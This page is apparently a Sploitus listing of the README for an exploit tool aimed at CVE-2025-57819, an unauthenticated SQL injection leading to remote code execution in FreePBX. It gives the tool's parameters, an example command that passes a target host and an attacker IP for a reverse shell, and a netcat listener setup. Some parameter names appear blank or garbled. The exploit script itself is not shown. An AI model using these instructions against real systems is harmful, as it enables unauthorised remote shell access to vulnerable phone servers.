Share
## https://sploitus.com/exploit?id=9300A862-8FDF-5FB3-B6EB-72DB0241BA85
# CVE-2025-57819 Exploit
## Metadata
- **Severity:** Critical (9.8)
- **Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Type:** Unauthenticated SQL Injection โ Remote Code Execution
- **Affected Software:** FreePBX (endpoint module) `
```
#### Parameters
- ``: Target hostname or IP address (vulnerable FreePBX instance)
- ``: Attacker IP address for reverse shell callback
- ``: Listening port for incoming connection
#### Example:
```python
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
```
## Listener Setup
Start a listener before executing the exploit:
```bash
nc -lvnp
```
#### Example:
```bash
nc -nlvp 9999
```
## Disclaimer
This tool is intended for educational purposes and authorized security testing only. Unauthorized use against systems without explicit permission is illegal. The author assumes no responsibility for misuse or damage caused by this tool.
## Author
Its1Zero - ic47@protonmail.com
## References
- https://nvd.nist.gov/vuln/detail/cve-2025-57819
- https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819